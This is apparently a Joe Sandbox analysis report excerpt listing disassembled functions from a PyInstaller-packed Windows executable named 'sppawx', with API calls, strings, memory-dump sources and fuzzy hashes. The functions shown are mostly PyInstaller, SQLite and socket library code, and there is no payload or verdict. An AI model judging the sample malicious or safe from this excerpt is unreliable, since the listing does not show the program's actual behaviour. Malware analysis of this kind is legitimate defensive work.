PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF79A313882, 00007FF79A3138AF
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF79A313971
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF79A313EA6
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF79A313BE8
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF79A3139DE
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF79A313A0B, 00007FF79A313CD4, 00007FF79A313F6B
pyi-contents-directory, xrefs: 00007FF79A313B8D
Could not create temporary directory!, xrefs: 00007FF79A313CBF
pyi-python-flag, xrefs: 00007FF79A313AD6

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
Instruction ID: 0cf9c1b22694ffbcbc11b5977d8b8f83a031d1d6c560bfee3f93159889580c1e
Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
Instruction Fuzzy Hash: 35329A22E0E68291FAB5FB3194543B9F6A1AF44784FC540BEDA4D432D6EF2CE559C320

Function 00007FF79A3369D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79A336708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A336749
Part of subcall function 00007FF79A336708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3367C7
Part of subcall function 00007FF79A336708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A336818

CreateFileW.KERNEL32 ref: 00007FF79A336ADA
CreateFileW.KERNEL32 ref: 00007FF79A336B2A
GetLastError.KERNEL32 ref: 00007FF79A336B5A
GetFileType.KERNEL32 ref: 00007FF79A336B6F
GetLastError.KERNEL32 ref: 00007FF79A336B79
CloseHandle.KERNEL32 ref: 00007FF79A336BAC
CloseHandle.KERNEL32 ref: 00007FF79A336D0F
CreateFileW.KERNEL32 ref: 00007FF79A336D44
GetLastError.KERNEL32 ref: 00007FF79A336D53

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 5f82996227fa5378870b2b28f75933b8870d17b2b7b8c67f920999bd86a178dd
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 81C1CF32F29A418AFB24EF79C4902AD7761EB49B98B81526DDF2E57794CF38D011C310

Function 00007FFEDCCB7200 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 885librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFEDCCB7D15
GetProcAddress.KERNEL32 ref: 00007FFEDCCB7D33
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFEDCCB7DB3
VirtualProtect.KERNEL32 ref: 00007FFEDCCB7DD1

Strings

TLS 1.1, xrefs: 00007FFEDCCB721C

Memory Dump Source

Source File: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true

Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: TLS 1.1
API String ID: 3300690313-2459780185
Opcode ID: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
Instruction ID: 6bd55460f0bcf0bba073dd75793f2eae90d25dfcde3a2fb10ac1e764cca323e8
Opcode Fuzzy Hash: e9bd674313fd626e8b10bb5bd9aba1fc995f4c064e3db001b0372bd032c2116d
Instruction Fuzzy Hash: 1262252272819286E7158E3CD44027D76A2F7487C5F285536EF9EC3BD4EA3CEA46CB11

Function 00007FFEDD2A8290 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 522COMMON

Download Yara Rule

APIs

00007FFEF5CE19C0.VCRUNTIME140 ref: 00007FFEDD2A83DE

Strings

immutable, xrefs: 00007FFEDD2A87ED
-journal, xrefs: 00007FFEDD2A8637
nolock, xrefs: 00007FFEDD2A87B6

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID: 00007
String ID: -journal$immutable$nolock
API String ID: 3568877910-4201244970
Opcode ID: 670a7a8c497eb5fd3f2ff43fc5247f21d9589723c58f9e3c3d7439a388d8b803
Instruction ID: 51aa6546d4a4055eca8f81a6de8855747215f3e647f84760fcd1cc111035af43
Opcode Fuzzy Hash: 670a7a8c497eb5fd3f2ff43fc5247f21d9589723c58f9e3c3d7439a388d8b803
Instruction Fuzzy Hash: 2C327B22A0968686EB758F2594403BDB7A5FF84B94F0C5236CA6E47BE4EF3CE454C710

Function 00007FFEDD311850 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 369COMMON

Download Yara Rule

APIs

00007FFEF5CE19C0.VCRUNTIME140 ref: 00007FFEDD3118BF

Strings

database schema is locked: %s, xrefs: 00007FFEDD311A16
statement too long, xrefs: 00007FFEDD311A76
out of memory, xrefs: 00007FFEDD31192B

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID: 00007
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 3568877910-1046679716
Opcode ID: 0ccca2f0d9bf7c621ae046b7d29a199d906cdf17e38475c7e203808ad0232101
Instruction ID: 3c35edb6e1d127ea978751e9fa5c442df8cd75b0284f9a4fd6aba40524fc28cf
Opcode Fuzzy Hash: 0ccca2f0d9bf7c621ae046b7d29a199d906cdf17e38475c7e203808ad0232101
Instruction Fuzzy Hash: CFF16D22A0D68286EB758F21D4547FEABA0FB85B98F0C4136DA4D07BE5EF7CE4458740

Function 00007FFEDD287120 Relevance: 6.9, APIs: 4, Instructions: 889librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFEDD287C35
GetProcAddress.KERNEL32 ref: 00007FFEDD287C5F
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFEDD287CDF
VirtualProtect.KERNEL32 ref: 00007FFEDD287CFD

Memory Dump Source

Source File: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: a328c044abde94c790c807ec7476a3d4486e064cae7c39ffa82a3e6146d7cc39
Instruction ID: 67cddd7bb7404903284919182ad74329f3f367e945b6b2bd4517bdb6082e968a
Opcode Fuzzy Hash: a328c044abde94c790c807ec7476a3d4486e064cae7c39ffa82a3e6146d7cc39
Instruction Fuzzy Hash: DB62572262819287E7258F38D4403BD77A1F788785F085532EA9EC7BE4FA7CEA55D700

Function 00007FFEDD27507C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FFEDD2750FD

Strings

socket.bind, xrefs: 00007FFEDD2750CD
bind, xrefs: 00007FFEDD27509B

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: bind
String ID: bind$socket.bind
API String ID: 1187836755-187351271
Opcode ID: b44409763409b1b195a08de1e49c4d77a00137f7db31770aa5edf6614f75523b
Instruction ID: 1741bd5ef47b6a84126fa2ca48f8dd2d228cdd9625ffd4ce85a034482aba0ab2
Opcode Fuzzy Hash: b44409763409b1b195a08de1e49c4d77a00137f7db31770aa5edf6614f75523b
Instruction Fuzzy Hash: 0C11EA21A08B82A1EB309B51F8403AEA364FFC9BA1F481137DA4D57F64FF2CE5458B00

Function 00007FFEDD2B0A50 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 590COMMON

Download Yara Rule

APIs

00007FFEFBBD5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFEDD2B0AB8

Strings

:memory:, xrefs: 00007FFEDD2B0AAE

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID: 00007D5630
String ID: :memory:
API String ID: 155963650-2920599690
Opcode ID: 2e1d838c8e07f69dc28e0a255225248a6f1770488a93a18e233a608de4c13702
Instruction ID: 1288a736c9f90fd5c50db87c8844d3eb5066d7ad9f8887e4d88ab51c77cf2687
Opcode Fuzzy Hash: 2e1d838c8e07f69dc28e0a255225248a6f1770488a93a18e233a608de4c13702
Instruction Fuzzy Hash: 14429222A0978682EB768F25D55037D67A8FF95B84F094236DA4D47BB8EF7CE494C300

Function 00007FF79A3192F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF79A319323
FindClose.KERNEL32 ref: 00007FF79A319332

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 34a9221a88493ed2c2ef344eeacc4a411f978b4c18ae2030bd93ff780e9f6f3e
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 23F04422A1A64186F7709F70B489766B390BB84768F84067DEAAD026D4DF7CD0498A10

Function 00007FFEDD2A0180 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFEDD2A01A5

Memory Dump Source

Source File: 00000002.00000002.1752277858.00007FFEDD291000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFEDD290000, based on PE: true

Associated: 00000002.00000002.1752235786.00007FFEDD290000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3E9000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD3EB000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752277858.00007FFEDD400000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752538065.00007FFEDD402000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1752579795.00007FFEDD404000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd290000_sppawx.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
Instruction ID: 339eab55d07bbda672c5581a98e66316ffcde07da1c70f83c46b4320ba355502
Opcode Fuzzy Hash: b0054afb10e4f66619171edf603becae74e7afe6d3d72f3cb96377bce576b712
Instruction Fuzzy Hash: D2A1E720E4AB4782EE758B45A5502BC63A8FFA5B80F1C1637C91D06FF5FF6CA5948300

Function 00007FFEDD276268 Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFEDD276298

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: a84784d5baf149632b74e46f2c3d80672b82a35a91410d9067c1fd2c4abcf944
Instruction ID: 00ebecc4874a559c29769156c88b486363c62e7b84642af6afea35be799f35e8
Opcode Fuzzy Hash: a84784d5baf149632b74e46f2c3d80672b82a35a91410d9067c1fd2c4abcf944
Instruction Fuzzy Hash: C0E012B1B0064582DB689B19D45123963A0F748F75F245735DE3D8B7D0DE28D8E1C740

Function 00007FF79A311950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF79A317F80: _fread_nolock.LIBCMT ref: 00007FF79A31802A

_fread_nolock.LIBCMT ref: 00007FF79A311A1B

Part of subcall function 00007FF79A312910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E

Strings

fseek, xrefs: 00007FF79A3119F5
fread, xrefs: 00007FF79A311A32, 00007FF79A311B5C
Could not read full TOC!, xrefs: 00007FF79A311B55
Failed to read cookie!, xrefs: 00007FF79A311A2B
malloc, xrefs: 00007FF79A311B22
Failed to seek to cookie position!, xrefs: 00007FF79A3119EE
Could not allocate buffer for TOC!, xrefs: 00007FF79A311B1B
MEI, xrefs: 00007FF79A311991
calloc, xrefs: 00007FF79A311A68
Error on file., xrefs: 00007FF79A311B8D
Could not allocate memory for archive structure!, xrefs: 00007FF79A311A61

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
Instruction ID: 03c4d08e3115ac42c21fa2e0a380b22c70f6257345d3ce32a4b19bf3b1daf547
Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
Instruction Fuzzy Hash: EA816E71A0EA8696FB70EB34D0452F9B3A0AF88784FC4447DE98D47785DE3CE5868760

Function 00007FFEDD275AB8 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 234
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32 ref: 00007FFEDD275CC4
SetHandleInformation.KERNEL32 ref: 00007FFEDD275CEE
closesocket.WS2_32 ref: 00007FFEDD275D03
getsockname.WS2_32 ref: 00007FFEDD275D8E
WSAGetLastError.WS2_32 ref: 00007FFEDD275DAD
getsockopt.WS2_32 ref: 00007FFEDD275DEA
WSASocketW.WS2_32 ref: 00007FFEDD275E4C

Strings

socket.__new__, xrefs: 00007FFEDD275B2D, 00007FFEDD275C25
Oiii, xrefs: 00007FFEDD275B1B, 00007FFEDD275C65
socket descriptor string has wrong size, should be %zu bytes., xrefs: 00007FFEDD275B7C
negative file descriptor, xrefs: 00007FFEDD275D52

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
API String ID: 141981615-2881308447
Opcode ID: 51c0c51d7ade0c141ff158bc388cd8ab4400a00c2f97c7c74dffe455cbaabff0
Instruction ID: 24e21a2c5932c01efbe24a6b62c48f7d689456d0cbd8622f26c7bfdc58ae90a1
Opcode Fuzzy Hash: 51c0c51d7ade0c141ff158bc388cd8ab4400a00c2f97c7c74dffe455cbaabff0
Instruction Fuzzy Hash: 82B14162E08B8592E6308B2998042BD6360FBD9BB4F185336DE5D53AB5FF3CE5858700

Function 00007FFEDD2770E0 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 00007FFEDD2772CA
FreeAddrInfoW.WS2_32 ref: 00007FFEDD2773F9
FreeAddrInfoW.WS2_32 ref: 00007FFEDD277483

Strings

socket.getaddrinfo, xrefs: 00007FFEDD27726B
iiisO, xrefs: 00007FFEDD277358
OO|iiii:getaddrinfo, xrefs: 00007FFEDD277130
Int or String expected, xrefs: 00007FFEDD277438
idna, xrefs: 00007FFEDD2771AF
OOiii, xrefs: 00007FFEDD27725A
getaddrinfo() argument 1 must be string or None, xrefs: 00007FFEDD277492

Memory Dump Source

Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true

Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd

Similarity

API ID: AddrFreeInfo$getaddrinfo
String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
API String ID: 2288433384-1074899869
Opcode ID: 7441c1bdc6c0a51231ad90fd4d61be9deae8f579bfc0bdc344df3fee02db1e18
Instruction ID: 85ec446f3f1f837c681394ba1afd628604104d01ca0421c3d89b69e3d48f8a9b
Opcode Fuzzy Hash: 7441c1bdc6c0a51231ad90fd4d61be9deae8f579bfc0bdc344df3fee02db1e18
Instruction Fuzzy Hash: E4C11432B09A42A6EB349F61D4646BC37B4BB88BA4F084536DE4E53E64EF7CE545C700

Function 00007FF79A311470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF79A31149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF79A311518
fseek, xrefs: 00007FF79A3114E5
fread, xrefs: 00007FF79A3115E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF79A3114DE
malloc, xrefs: 00007FF79A31151F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF79A3115DF

Memory Dump Source

Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true

Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd

Similarity

API ID: CurrentProcess
